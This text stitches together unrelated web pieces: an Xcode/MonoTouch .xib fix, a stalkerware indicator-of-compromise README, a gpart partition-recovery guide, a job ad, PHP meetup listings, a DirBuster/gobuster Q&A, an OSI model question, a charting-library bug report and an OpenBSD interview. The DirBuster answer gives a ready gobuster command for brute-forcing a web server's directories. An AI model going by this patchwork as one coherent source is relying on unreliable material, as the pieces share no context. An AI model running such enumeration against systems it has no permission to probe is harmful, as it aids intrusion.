Does a 3S 18650 battery pack need a balanced charge circuit? I am looking at building a custom power bank with 3 or 4 cells in series to generate 11-15 V. I am looking at some of the TI Li-ion charger ICs, the BQ257x3 and BQ241xx. These are really nice ICs, but they don't charge or balance the cells individually. Of course, they do implement the proper Li-ion charge cycle: constant current first, then constant voltage until the current drops. They also have over-voltage protection, temperature monitoring, input current limiting, and so on, so they do overlap in functionality with the battery pack protection boards that usually monitor individual cells. So assuming there is a protection board on the pack that monitors at least the minimum/maximum voltage per cell, and that the individual cells are all new, from the same brand/model, and likely even from the same production batch, would there still be a need to charge/balance all cells independently? Or can I just treat the 3S pack as a single battery and assume the cells all charge/discharge at the same rates? The other question I have is: if I use one of those charger ICs, which already monitor for over-voltage, (dis)charge current, and temperature on the battery pack, and turn off the output if the total battery pack voltage gets too low, is there still even a need for the protection board on the battery pack (as long as the cells are new and identical)? Or can I just hook up 3 cells in series directly to the charger without the risk of the batteries over- or undercharging and thus breaking, or worse (provided the rest of the circuit matches safe charge currents at around C/2 and safe voltages for those cells, of course)? can I just treat the 3S pack as a single battery and assume they all charge/discharge at the same rates? - No, you shouldn't. Based on your questions, I suspect you don't yet have the basic understanding required to design your own power bank. 
I strongly recommend that you buy a ready-made power bank: safe, guaranteed to work, cheaper. Or, if you must build your own, I recommend you buy a ready-made BMS: safe, guaranteed to work, cheaper. I recommend you buy a ready-made charger: safe, guaranteed to work, cheaper. Does a 3S 18650 battery pack need a balanced charge circuit? Balancing a string of cells in series is optional in the sense that it is not a safety feature. However, balancing is highly desirable, as it maximizes the effective capacity of a string of cells over time. That is why it is almost universally implemented; just about every BMS IC implements balancing. BQ25723 and BQ241xx. Those are not BMS ICs; those are charger ICs. A charger is not a BMS. You need both: a charger AND a BMS. The probability of mismatched capacity in the equivalent circuit increases with the number of series cells. There will also be a tolerance on each cell's ESR. The cell voltage under CC mode will be: Vcell = (1/C) * Integral(Ichg dt) + Ichg * ESR, with C in farads, for each cell. So when the charger changes from CC mode to CV mode and cuts off at, say, 5% of Ichg, will the voltage and energy stored in each cell be the same? No, and the difference in state of charge (or overcharge) determines how fast that difference is amplified on each charge cycle. Things may be fine for a couple hundred charge cycles as long as the cells don't get deeply discharged; after that, aging occurs more rapidly on the weakest cell. So it all depends on how well matched your cells are. Consider how hard it is to make electrolytic caps with < 1% tolerance; this is significant, and the situation is similar for electrolytic batteries. In short, you don't need to worry if you don't care how many cycles you get, but if the cells don't come from the same batch process, you can always extend the life of the pack by using a balancer. Time spent above 4 V and below 3 V significantly accelerates aging, so it totally depends on your reliability expectations. 
Manufacturers can expect tighter tolerances with process controls, but end users cannot know which batch their parts come from. The other question I have is if I use one of those charge ICs, which already monitor for over-voltage, (dis)charge current, and temperature on the battery pack, and turn off the output if the total battery pack voltage gets too low, NO. THEY. DON'T. Those ICs are chargers, not protectors. Those ICs do not protect your battery. is there still even a need for the protection board on the battery pack (as long as they are new and identical cells)? You MUST have a protector BMS in your battery. A protector BMS is absolutely required, and a charger is absolutely required. They are two different devices, and each is absolutely required.
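The cell-divergence argument can be sketched numerically. This is a minimal sketch assuming a crude linear cell model (cell capacity expressed as an effective capacitance in farads, fixed ESR); the part values and the simulateCC helper are illustrative assumptions, not from the answer above:

```javascript
// Two series cells charged at constant current. Per the relation
// Vcell = (1/C) * Integral(Ichg dt) + Ichg * ESR, the lower-capacity
// cell's voltage runs ahead, so it reaches the per-cell limit first
// even while the total pack voltage still looks fine.
function simulateCC(cells, ichg, dt, steps) {
  let charge = 0; // coulombs; series cells all carry the same current
  for (let i = 0; i < steps; i++) charge += ichg * dt;
  return cells.map((cell) => charge / cell.farads + ichg * cell.esr);
}

const cells = [
  { farads: 7500, esr: 0.05 }, // nominal: ~2500 mAh over a ~1.2 V window
  { farads: 7350, esr: 0.06 }, // ~2% low capacity, slightly higher ESR
];
const dv = simulateCC(cells, 1.25, 1, 7000); // 1.25 A (~C/2) for ~2 h
// dv[] is each cell's voltage rise above the empty-cell voltage
console.log(dv.map((x) => x.toFixed(3)).join(" V, ") + " V"); // → 1.229 V, 1.265 V
```

Even with only a 2% capacity mismatch, the weaker cell is ~36 mV ahead after one partial charge, which is exactly the drift a per-cell balancer corrects.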
STACK_EXCHANGE
Published on Ingenium n. 102, April-May 2015 Journal of Terni’s Institution of Engineers (Cineca-MIUR scientific magazine n. E203872) Software engineering is a young discipline, with solid scientific bases in several fields of mathematics and in some fields that pertain strictly to computer science (e.g. relational database theory and compiler theory). Still, software engineering is fertile ground for “snake oil salesmen”: when facing a problem to be solved, it’s easy to find scores of experts (gurus, mentors) that promote the fashion du jour as the definitive panacea. The comparison with other engineering disciplines is depressing. In civil engineering, for example, the materials and their shape are (or should be) chosen on the basis of a solid corpus of scientific knowledge: the forces that the structures will need to face, and the different properties of materials (e.g. elasticity) that describe their behavior in reaction to such forces. Is iron better, or an alloy of iron, carbon, and chromium? The correct answer is that the question is ill-posed: it depends on the problem at hand! But take a sample of (more or less aware) software engineering practitioners and ask them: is functional programming better, or object-oriented programming? Is Java better, or C#? Rest assured that you will almost always get sharp and heartfelt answers: for the most part, nowadays, software engineering is nothing more than a rhetorical exercise, while an argument about the material and the shape to be used in a physical construction can be resolved, without endless debates, just by the accurate usage of physics and material science. If we consider the laws of physics, in fact, it would be pointless to build a house by using glass only (“it’s brighter!”) or bricks only (“it’s stronger!”): the usefulness of the materials depends on the context. And yet, while developing software, this happens often: we build a “house” by using “bricks” only, or “glass” only. 
For several years Carlo Pescio, a well-known Italian software engineering professional, has been trying to create a basic theory that he named the “physics of software”: software is considered as a material, while software design (at every level) is considered as the process of shaping the software/material in the most appropriate way to solve the problem at hand. If we adopt this point of view, and we try to draw an analogy with material science, we must ask ourselves: what do we know about the software/material’s properties and about the “forces” that it must withstand? Not much, so far. In the software engineering body of knowledge we mostly find: - Principles and methods: more or less dogmatic practices, stripped of their original context and raised to the rank of principles; the process of stripping the context away makes such principles ill-defined and/or superfluous. - Patterns and reference designs: catalogs of design techniques to solve specific problems. - Metrics: software properties that can be measured more or less easily, but whose clarity and usefulness in the software design process are rather questionable. They may look similar to the aforementioned material properties, but they are not defined as a direct reaction to specific “forces”. - -ilities: reliability, scalability, maintainability, etc. At first glance they may look like the aforementioned physical material properties, but they are fundamentally different: their definition is too generic (they are not defined as reactions to “forces”), so they cannot be measured in a meaningful way. Saying that a piece of software is “scalable” is more like saying that a car is “safe”; it’s completely different from describing the resistance of a metal alloy to a compression force. In other words, while the analogy “software”/”material” and “software design”/”material shaping” is very clear, we still don’t have any idea about the software properties and about the “forces” that determine such properties. 
In his work on the “physics of software”, Carlo Pescio tries to explore these aspects by defining something that we can call a “basic physics” for software: a theory of software properties and forces. Don’t let the metaphor mislead you, though, because software’s nature is rather peculiar: software is executable knowledge, designed to be interpreted both by humans, who write and read programs, and by computers, which must run them to obtain the desired results. So, even if the physics of materials was the inspiration for this research, the model that Carlo Pescio is building looks more like quantum physics. Currently, his “physical” software model is based on two main concepts: - The software exists in three spaces: the decision space (the design’s product), the artifact space (the coding’s product), and the run-time space (the product of the program’s execution by a computer). - The concept of “entanglement“, borrowed directly from quantum physics. Entanglement is a link between components that, with different modes of interaction, characterizes software in each of the three aforementioned spaces. Starting from these two concepts, plus a few other basic ones, it is possible to derive most of the principles and patterns that form the current written and spoken tradition of software engineering. Carlo Pescio’s research on the “physics of software” is documented on the website www.physicsofsoftware.com. For some time the author has paused publishing his ideas, partly because of their poor reception (it cannot be otherwise, in a world filled with the background noise of gurus and mentors, remember?). Still, his research is essential for the evolution of software engineering: the results he published on his website are a great starting point for meditating deeply on the nature of software engineering. Let’s hope that we can read the next chapters soon!
OPCFW_CODE
Support for PiZero/PiZeroW RaspberryMatic and ELV state that the module/software is compatible with Pi 2 & 3. However, the Zero and the Zero W both have the same GPIO pinout, so I don't see why they should not work. Is the missing support maybe an oversight, or is there an obvious reason why I shouldn't try it? This is of course a very valid question (which in fact I have already thought about myself). The answer is, however, also quite straightforward: technically there shouldn't be any reason why the Pi Zero or the newer Pi Zero W won't work with RaspberryMatic – but there is still some work to do! The currently shipped image won't work with the Pi Zero hardware out of the box, because the main hardware of the Pi Zero is based on the older RaspberryPi 1 model, which has a different/older SoC chip than the Pi 2 or Pi 3 models. It shouldn't be a big deal to tune the build environment of RaspberryMatic to also build its own image for the Pi Zero / Pi Zero W, which should then also enable RaspberryMatic to work on the much older RaspberryPi 1 models. I simply lacked the time (though I have a Pi Zero at home) to actually work on this. The sales numbers of Pi Zero boards are still quite small (there was a one-board-per-customer limitation). The older hardware (compared to a Pi 3) and the fact that a CCU should normally run as a server 24h/7days also raise some questions about whether really big numbers are to be expected for a CCU running on a PiZero. Up to the recent release of the PiZeroW with embedded WiFi/Bluetooth, it was even more questionable to use a PiZero at all for RaspberryMatic, because until recently WiFi support was non-existent in RaspberryMatic. Now that we have working WiFi support in RaspberryMatic (coming with the next beta5 version), the PiZero might be more usable. But also keep in mind that using WiFi for something critical like a CCU is questionable in itself due to stability/security concerns. 
To summarize: I fully understand the wish to use a PiZero for RaspberryMatic, and I haven't yet abandoned the idea completely. But it simply had, and still has, low priority to be implemented. If you have something to contribute, feel free to send over some Pull Requests, which I would happily integrate into the main repository of RaspberryMatic :) Please also note that the same question can be raised for other embedded platforms like BananaPi, etc. – which I would in principle also be happy to support in a future version of RaspberryMatic. Thanks for the response. You can order more than one Zero W by now, and it's way more useful than the old Zero, so I guess the sales will go up. Funny, until you mentioned the WLAN I didn't even think about the fact that it does not have a LAN port 😄 But I guess that's not an issue [in my case] with a stable WLAN. I'm a newbie in the Homematic world for now, but since I'll get some Zero Ws soon I sure can try to build it on one of them. The HM-MOD-RPI-PCB works on the GPIO of the Model B (without +) with YAHM. What's the state of the RaspberryPi Model B in RaspberryMatic? @renne Not working yet. I guess it will be supported once I have support for the Pi Zero line ready. However, support for RaspberryPi models other than Pi2/3 currently has low priority. Any way we can support the development for the Pi Zero? I would love to see a working image for my Pi Zero W to be able to use Homematic in my caravan. :-) @jens-maus RaspberryPi Zero W + HM-MOD-RPI-PCB would be a cheap replacement for the LAN Gateway (HM-LGW-O-TW-W-EU). ;) Would it be possible to generate an additional image for the RaspberryPi Zero W that only includes the hmlangw daemon? So one could easily build a wireless LAN GW that does not need any configuration. Of course this is possible, and it is also a plan. However, I need time for that, which I currently don't have. 
But feel free to help out by implementing Pi Zero W support :) Is there anything special concerning Pi Zero support in the "pizero" branch yet? No, there is nothing "special" about it, it is just a development branch which I haven't finished yet because other things were more important. Thus, the "pizero" branch doesn't produce a running RaspberryMatic for PiZero systems (yet).
GITHUB_ARCHIVE
const sumPetYears = require("./js-III");

const pets = [
  { name: "Tinkerbell", species: "cat", age: 2 },
  { name: "Lucy", species: "dog", age: 12 },
  { name: "Chloe", species: "cat", age: 18 },
  { name: "Mojo", species: "dog", age: 6 },
  { name: "Olivia", species: "parakeet", age: 4 },
  { name: "Shadow", species: "cat", age: 8 },
  { name: "Oreo", species: "cat", age: 5 },
  { name: "Molly", species: "dog", age: 4 },
  { name: "Freddie Prinze Jr.", species: "parakeet", age: 9 }
];

test("Takes in a database of pets, the type of pet searched for, and number of years to multiply, and returns total number", () => {
  expect(sumPetYears(pets, "parakeet", 5)).toBe("The combined parakeets' ages: 65");
  expect(sumPetYears(pets, "dog", 7)).toBe("The combined dogs' ages: 154");
  expect(sumPetYears(pets, "cat", 4)).toBe("The combined cats' ages: 132");
});
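The implementation under test (`./js-III`) is not included in the snippet. A minimal sketch that satisfies the assertions could look like the following; the filter/reduce approach is an assumption, since only the expected strings are given by the test:

```javascript
// Hypothetical implementation matching the test: filter by species,
// sum the matching pets' ages, multiply by the year factor, and
// format the result string (note the trailing apostrophe: "dogs'").
function sumPetYears(pets, species, years) {
  const total = pets
    .filter((pet) => pet.species === species)
    .reduce((sum, pet) => sum + pet.age, 0);
  return `The combined ${species}s' ages: ${total * years}`;
}

module.exports = sumPetYears;
```

Note the pluralization simply appends `s'`, which works for "cat", "dog", and "parakeet" but would not generalize to irregular plurals.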
STACK_EDU
[v1] Use WINAPI calling convention for native APIs See https://github.com/dotnet/diagnostics/issues/846#issuecomment-606996179 Should it be documented somewhere why things are as they are? Maybe in the form of a unit test reflecting on delegate metadata to catch accidental changes? Someone starting to work on the project in the future might be tempted to "fix" the unannotated delegates just by looking at them. I just want to make sure I understand this change before merging it. This change is asserting: The calling convention of COM calls on Windows is stdcall. The calling convention for "COM" code on Linux is cdecl (e.g. ISOSDac6::DacGetMethodTableCollectibleData's implementation is cdecl on Linux). The calling convention should be changed to WinAPI, which selects the appropriate behavior (1 & 2) on the corresponding systems. Simply omitting the [UnmanagedFunctionPointer] attribute altogether is equivalent to [UnmanagedFunctionPointer(CallingConvention.Winapi)]. Is that correct? A couple of questions: What problem is being solved by changing from StdCall to Winapi? I.e., how does ClrMD function at all on Linux without causing stack corruption if we've been providing the wrong calling convention? Does the correct behavior still happen on Desktop CLR? I assume the default is stdcall on Desktop CLR? The calling convention of COM calls on Windows is stdcall. STDMETHODCALLTYPE is defined as __stdcall in winnt.h. The calling convention for "COM" code on Linux is cdecl (e.g. ISOSDac6::DacGetMethodTableCollectibleData's implementation is cdecl on Linux). STDMETHODCALLTYPE is defined as __cdecl (since .NET Core 2.1). https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/debug/daccess/dacimpl.h#L1190 https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/pal/inc/rt/palrt.h#L197 The calling convention should be changed to WinAPI, which selects the appropriate behavior (1 & 2) on the corresponding systems. 
WinAPI is converted to the default calling convention. https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/vm/dllimport.cpp#L3292 Simply omitting the [UnmanagedFunctionPointer] attribute altogether is equivalent to [UnmanagedFunctionPointer(CallingConvention.Winapi)]. The default calling convention is __stdcall on Windows and __cdecl on Linux (since .NET Core 2.1). https://github.com/dotnet/runtime/blob/8e0147ecdfd2717362ca0a859089968bad17aefc/src/coreclr/src/vm/dllimport.cpp#L3273 What problem is being solved by changing from StdCall to Winapi? I.e., how does ClrMD function at all on Linux without causing stack corruption if we've been providing the wrong calling convention? If we provide the wrong calling convention on Linux x86, ClrMD causes stack corruption on every reverse-interop call and the program crashes with a segmentation fault. Does the correct behavior still happen on Desktop CLR? I assume the default is stdcall on Desktop CLR? I assume yes. Ahh, thanks for the clarifications! If we provide the wrong calling convention on Linux x86, ClrMD causes stack corruption on every reverse-interop call and the program crashes with a segmentation fault. The fact that it was Linux x86 was also the part I missed. This isn't a scenario I tested before. I will make this same change in 2.0. I'm working on changes closely related to this and will fold that into it.
GITHUB_ARCHIVE
How to state the Pythagorean theorem in a neutral synthetic geometry? In some lists of statements equivalent to the parallel postulate (such as Which statements are equivalent to the parallel postulate?), one can find the Pythagorean theorem. To prove this equivalence one has first to state the Pythagorean theorem in neutral geometry (I call 'neutral geometry' a geometry in which parallel lines do exist but with the parallel postulate removed). If one starts with an axiom system like Birkhoff's postulates, which assume the real numbers and ruler and protractor from the beginning, then there is no problem stating the Pythagorean theorem. My question is: how can one state the Pythagorean theorem in a neutral synthetic geometry based on axioms such as Hilbert's axiom groups I, II, III or Tarski's axioms $A_1-A_9$? It is possible to define segment length in neutral Tarski or Hilbert geometries as an equivalence class using the congruence ($\equiv$) relation. It is also possible to define congruence of triangles. However, the geometric definition of multiplication as given by Hilbert assumes the parallel postulate, and the existence of a square is equivalent to the parallel postulate. What is "neutral synthetic geometry"? In particular, does it contain a notion of segment length and angle measurement? And if so, why can't you then simply state the Pythagorean theorem in the ordinary way? @LeeMosher I edited the question. Neutral geometry is geometry without the parallel postulate. One can define segment length as an equivalence class using congruence of segments. But to state that $a^2 + b^2 = c^2$ you cannot use multiplication, because the usual definition of multiplication uses the parallel postulate. How about area measurement, does that exist in your system? If so, then perhaps, without the parallel postulate, one can define and construct the geometric square on a given side, i.e. a regular quadrilateral. 
And then use the areas of squares to state the Pythagorean theorem. It will be false, of course, if the parallel postulate fails, but you can state it. Victor Pambuccian pointed me to the following note, which gives a partial answer to the question: http://link.springer.com/article/10.1007/s00283-010-9169-0 This link shows that the Pythagorean theorem implies the parallel postulate: https://www.cut-the-knot.org/triangle/pythpar/PTimpliesPP.shtml The link does not explain how to state the Pythagorean theorem in neutral geometry. Within a synthetic approach to geometry (such as Hilbert's axioms) one can define the notion of segment measure: Definition. Denote the set of segments by $\mathcal{S}$. We say that a function $\mu:\mathcal{S}\rightarrow \mathbb{R}$ is a segment measure whenever: $\mu(ab)>0$. $ab\equiv a_1b_1$ $\implies$ $\mu(ab)=\mu(a_1b_1)$. $B(abc)$ $\implies$ $\mu(ab)+\mu(bc)=\mu(ac)$. Here $B(abc)$ stands for "point $b$ lies between $a$ and $c$", which is a primitive notion. The definition involves real numbers, but they are regarded independently from the theory of geometry. The following two theorems serve to answer the question about the Pythagorean theorem: Theorem 1. If $\mu,\mu_1$ are segment measures, then there exists $\lambda>0$ such that $\mu=\lambda\mu_1$. Theorem 2. There exists a segment measure $\mu$ (in fact it can be chosen in such a way that $\mu(ab)=x$ for an arbitrary segment $ab$ and $x>0$). Assume we are given a triangle $\triangle abc$ with the right angle at $c$. Combining these two theorems we see that we can state $$\mu(ab)^2=\mu(bc)^2+\mu(ac)^2$$ and prove that its logical value does not depend on the choice of the measure: if the above sentence is true for some measure $\mu$, then for an arbitrary measure $\mu_1$ we have $\mu=\lambda\mu_1$ for some $\lambda>0$, hence $$\lambda^2\mu_1(ab)^2=\lambda^2\mu_1(bc)^2+\lambda^2\mu_1(ac)^2$$ and therefore $$\mu_1(ab)^2=\mu_1(bc)^2+\mu_1(ac)^2.$$ For the proof of Theorems 1 and 2 see "Foundations of Geometry" by Borsuk and Szmielew.
STACK_EXCHANGE
Achieving 2030 Sustainable Development Goals using Cloud Sustainable Software Engineering is an emerging concept that continues to evolve as the developer community becomes more engaged. In this post, I will discuss the various levers that Microsoft and the development community have on hand to maximize the promise of sustainable development and growth. I will also explore various tools that the Microsoft developer community can use to develop more sustainable software and accelerate progress towards the 2030 Sustainable Development Goals. Given this post’s focus on Sustainable Software Engineering, I want to define what exactly ‘sustainability’ means. The UN World Commission on Environment and Development offers that, “Sustainable development is development that meets the needs of the present without compromising the ability of future generations to meet their own needs.” While this is probably one of the more frequently quoted definitions of sustainability, I find a visual representation of sustainable development principles more actionable. The concept of a ‘doughnut’ was first published by Kate Raworth in the 2012 Oxfam Report, and has since gained wide acceptance in the sustainable development community. The doughnut is derived from two boundaries – a social foundation and an ecological ceiling. In her 2017 book, “Doughnut Economics: seven ways to think like a 21st century economist,” Raworth argues that the social foundation is complementary to the ecological planetary boundary. Basic human needs such as food, clean water, education, equality, and social justice cannot be met without access to a regenerative and healthy ecological environment. Social foundation and ecological ceiling principles are also reflected in the 17 Sustainable Development Goals published by the United Nations in 2015. 
While the 17 goals published by the UN may seem to cover a very broad set of issues, on closer examination it becomes apparent that they are interconnected via positive and negative feedback loops. Måns Nilsson, Dave Griggs, and Martin Visbeck published a detailed explanation of how these goals either reinforce or cancel each other out. The authors provide real-world examples of these positive and negative interactions, summarized below:

- Indivisible (inextricably linked to the achievement of another goal): ending all forms of discrimination against women is indivisible from ensuring women's full and effective participation and equal opportunities for leadership.
- Reinforcing (aids the achievement of another goal): providing access to electricity reinforces water-pumping and irrigation systems; strengthening the capacity to adapt to climate-related hazards reduces losses caused by disasters.
- Enabling (creates conditions that further another goal): providing electricity access in rural homes increases education opportunities, because it makes it possible for students to complete homework at night with electric lighting.
- Consistent (no significant positive or negative interactions): ensuring education for all does not interact significantly with infrastructure development or conservation of ocean ecosystems.
- Constraining (limits options on another goal): improved water efficiency can constrain agricultural irrigation; reducing climate change can constrain options for energy access.
- Counteracting (clashes with another goal): boosting consumption for growth can counteract waste reduction and climate mitigation.
- Cancelling (makes it impossible to reach another goal): ensuring public transparency and democratic accountability cannot be combined with national-security goals; full protection of natural reserves excludes public access for recreation.

The UN also provides a practical example to demonstrate goals and their interactions that you can find here. So, what does it mean for the cloud? 
As a program manager working on the Microsoft Azure team, I see several opportunities to apply sustainable development principles across various dimensions that will ultimately create a self-reinforcing loop between Microsoft and the developer community. As Microsoft pursues its mission to “empower every person and every organization on the planet to achieve more,” the developer community can use its tools and services to help the world reach the 2030 Sustainable Development Goals, while Microsoft pursues its own 2030 pledge to become carbon negative. Building Blocks for Sustainable Development on Azure Cloud infrastructure is the base infrastructure required to run cloud applications. It consists of hundreds of data centers across the world, thousands of miles of fiber-optic cables, and millions of servers running in those data centers. While the software itself has a low environmental impact, the infrastructure required to run it can have a drastic negative one: from raw material extraction through the manufacturing of components, assembly, and deployment, Microsoft cloud infrastructure represents a significant portion of Microsoft’s carbon footprint. Microsoft’s pledge to be carbon negative by 2030 includes a strong commitment to transforming its supply chain into a circular cloud supply chain, with the goals of minimizing embodied carbon in the hardware it operates, optimizing the efficiency of its physical infrastructure, and minimizing end-of-life e-waste. Azure Fabric is the operating system of the cloud. Azure Fabric manages physical resources such as computers, storage, and networks, and is responsible for ‘always-on’ availability, self-healing, optimization of available resources, and scale. 
While invisible to the end customers and developers, the Azure team continuously works on optimizing the efficiency of the physical infrastructure while delivering on the promise of being the best platform to develop cloud applications and services. The Azure developer community can leverage Azure services to build end-user applications – whether these are mission-critical enterprise workloads, distributed Internet of Things (IoT) applications, mobile services, Artificial Intelligence (AI), or media applications – all can be done on Azure. This is also where the core of Sustainable Software Engineering practices come into play. Software engineers building applications on Azure can apply Sustainable Software Engineering principles to minimize the carbon footprint of their applications. For example, large batch jobs can be scheduled to run when carbon intensity of the power grid is at its lowest peak. You can check carbon intensity cycles in your region (or country) on the Electricity Map website. Watttime project also offers API access to carbon intensity data that can be used to programmatically schedule and time-shift power-intensive computer workloads in time and geography. In addition to maximizing the use of renewable energy sources, developers can achieve significant carbon savings thereby optimizing networking resources, as covered in my previous post. However, the impact that the developer community can have on sustainable development should not stop there. Developers can leverage Azure to build smart applications that can help reinforce all 17 Sustainable Development Goals. Sustainable Software Engineering Building applications that can directly and indirectly (such as through feedback loops) help the world achieve the UN Sustainable Development Goals is how I choose to think about Sustainable Software Engineering. 
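The time-shifting idea can be sketched in a few lines. This is a generic illustration only: the forecast data, its shape, and the pickGreenestHour helper are made-up assumptions, not part of the WattTime or Electricity Map APIs:

```javascript
// Carbon-aware scheduling sketch: given an hourly carbon-intensity
// forecast (gCO2eq/kWh), pick the lowest-carbon hour in the window
// and defer a flexible batch job until then.
function pickGreenestHour(forecast) {
  // forecast: [{ hour: number, intensity: number }, ...]
  return forecast.reduce((best, slot) =>
    slot.intensity < best.intensity ? slot : best
  );
}

// Made-up numbers for illustration.
const forecast = [
  { hour: 0, intensity: 420 },
  { hour: 3, intensity: 310 },  // overnight wind surplus
  { hour: 12, intensity: 250 }, // midday solar peak
  { hour: 18, intensity: 480 }, // evening demand peak
];

const slot = pickGreenestHour(forecast);
console.log(`Run the batch job at hour ${slot.hour} (${slot.intensity} gCO2eq/kWh)`);
```

In a real system the forecast would come from a carbon-intensity API and the deferral would be bounded by the job's deadline, but the core decision is this simple minimum over the forecast window.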
Microsoft will continue to invest its resources to further optimize its cloud infrastructure, power consumption, server, and network efficiency as well as building smart and efficient developer tools and services. As the developer community, we can use these tools and infrastructure to build tools and applications that serve longer-term objectives such as improving biodiversity, reducing carbon, promoting equality, access to education, health, and freshwater. As an example, the AI for Earth initiative relies on high-performance computer infrastructure to process massive amounts of satellite data, perform image recognition, and process sophisticated climate simulation and optimization tasks, all with the goal of unlocking insights and actionable interventions that will improve biodiversity, access to clean water, sustainable agriculture, and health. So, when we measure whether software is sustainable, it’s important to take into account the environmental impacts of the infrastructure, power consumption, and efficiency of the code, as well as the outcomes that the software enables. We can use the 17 Sustainable Development Goals as a guide and a litmus test of the impacts our applications have on the world around us.
OPCFW_CODE
Invalid XHTML in /components/com_kunena/views/topic/view.html.php

Question (Shaman): When I run my Kunena forum pages through the W3C validator, I get errors like these:

Warning Line 17, Column 701: cannot generate system identifier for general entity "layout"
…ndex.php?option=com_kunena&view=topic&layout=reply&catid=8&id=24" rel="nofollo…
Info Line 17, Column 689: entity was defined here

As you can see from the highlighted area, a bare & sign is being pulled in from somewhere with no ; after it, and one such character produces a cascade of warnings. Does anyone know how to fix this issue so that it does not throw up an error?

Answer: An entity in this context is an encoded character or symbol that you might want to present in a web page. Examples include &amp; to display an ampersand (&), which has a special meaning in HTML, and &copy; to display a copyright symbol (©), not commonly found on keyboards. Be careful to end entity references with a semicolon, or your entity reference may get interpreted in connection with the following text.

The most common cause of this error is unencoded ampersands in URLs, as described by the WDG in "Ampersands in URLs": the validator sees &view, &layout, &catid, and &id in the link above and tries to read each as an entity reference. The fix depends on where the ampersand appears:

- In a URL query string (either displayed in the page or in an element attribute): write &amp; instead of &.
- Directly in a web page's text: likewise write &amp; rather than a bare &.

So instead of outputting

index.php?option=com_kunena&view=topic&layout=reply&catid=8&id=24

you need to output

index.php?option=com_kunena&amp;view=topic&amp;layout=reply&amp;catid=8&amp;id=24

The &amp; entity is predefined in both HTML and XML, so it is always safe to use. Once the original problem is fixed, the cascading warnings will usually all disappear. If this error appears in markup generated by PHP's session handling code, that is a known issue with its own documented solutions.

A note from the Kunena team: various XHTML code validators will "object" because Kunena is not 100% compliant with the XHTML 1.0 recommendations. Invalid XHTML generally still works in browsers, but it is worth fixing where possible.
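As a concrete illustration (not from the thread itself), the escaping can be done mechanically. This Python sketch builds a Kunena-style URL from the parameters seen in the validator output above and escapes it for safe use inside an HTML attribute:

```python
import html
from urllib.parse import urlencode

# Build the Kunena URL with its query parameters.
params = {"option": "com_kunena", "view": "topic", "layout": "reply",
          "catid": 8, "id": 24}
raw_url = "index.php?" + urlencode(params)

# Writing raw_url into an HTML attribute as-is is what triggers the
# "cannot generate system identifier for general entity" warning: the
# validator reads "&view" as the start of an entity reference.
# html.escape turns each & into &amp;, which browsers decode back to &.
escaped = html.escape(raw_url)
print('<a href="%s">Reply</a>' % escaped)
```

The escaped form is what belongs in the page source; the browser still requests the URL with plain & separators after decoding the entities.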
OPCFW_CODE
LDAP Authentication Error

I'm getting an error in Grails when trying to use LDAP authentication to find a user with AD authentication. This is the code I have on the Grails side:

@Override
public UserDetails loadUserByUsername(String username) throws UsernameNotFoundException, DataAccessException {
    ArrayList<String> roles = new ArrayList<String>(2)
    roles.add("ROLE_USER")
    try {
        GldapoSchemaClassForUser.findAll(
            directory: "user",
            filter: "(userPrincipalName=${username})"
        ).each { user ->
            def userName = user.cn
            user.memberOf.each { groupListing ->
                String groupName = groupListing.substring(3, groupListing.indexOf(','))
                if (groupName.equals("Admin")) {
                    roles.add("ROLE_ADMIN")
                } else if (groupName.equals("User")) {
                    // Do nothing
                }
            }
        }
    } catch (Throwable e) {
        System.err.println(e.getMessage())
    }
    return new User(username)
}

It hits the catch block when it reaches the GldapoSchemaClassForUser.findAll call, showing this error message:

org.springframework.ldap.AuthenticationException: [LDAP: error code 49 - 80090308: LdapErr: DSID-0C090334, comment: AcceptSecurityContext error, data 525, vece

According to the documentation, a 525 error means an invalid user, but I have tested using an LDAP explorer tool and it connects to the user fine with the same details. In the app-config file I have the following LDAP settings:

ldap.directories.user.url=ldap://sbs.testsbs.local
ldap.directories.user.base=OU=staff,DC=skills,DC=local
ldap.directories.user.userDn=OU=staff,DC=skills,DC=local
ldap.directories.user.password=Pa55w0rd

Does anyone have any ideas as to what I am doing wrong?

Answer: Your error is in the app-config LDAP settings. The ldap.directories.user.userDn setting has been populated with a container, the same as you specified in ldap.directories.user.base. However, this should be the DN of the user object that is performing the search, something along the lines of:

ldap.directories.user.userDn=CN=myAppUser,OU=staff,DC=skills,DC=local

The 525 error does mean "user not found", but in this case it pertains to the user performing the bind, not the user you are searching for.
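For reference, the "data NNN" code in an AD error-49 diagnostic can be decoded mechanically. This is a small Python sketch using the commonly documented AD sub-code table (the helper function is my own illustration, not part of Grails or Gldapo):

```python
import re

# Well-known AD "data" sub-codes for LDAP error 49 bind failures.
AD_BIND_ERRORS = {
    "525": "user not found",
    "52e": "invalid credentials",
    "530": "logon not permitted at this time",
    "532": "password expired",
    "533": "account disabled",
    "701": "account expired",
    "773": "user must reset password",
    "775": "account locked out",
}

def explain_ldap_error(message):
    """Extract and translate the 'data NNN' code from an AD diagnostic string."""
    m = re.search(r"data\s+([0-9a-f]+)", message)
    if not m:
        return "unknown"
    return AD_BIND_ERRORS.get(m.group(1), "unrecognised code " + m.group(1))

msg = ("[LDAP: error code 49 - 80090308: LdapErr: DSID-0C090334, "
       "comment: AcceptSecurityContext error, data 525, vece")
print(explain_ldap_error(msg))  # user not found
```

Here 525 correctly points at the bind account: since userDn held a container rather than a user DN, the directory could not find a user to bind as.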
STACK_EXCHANGE
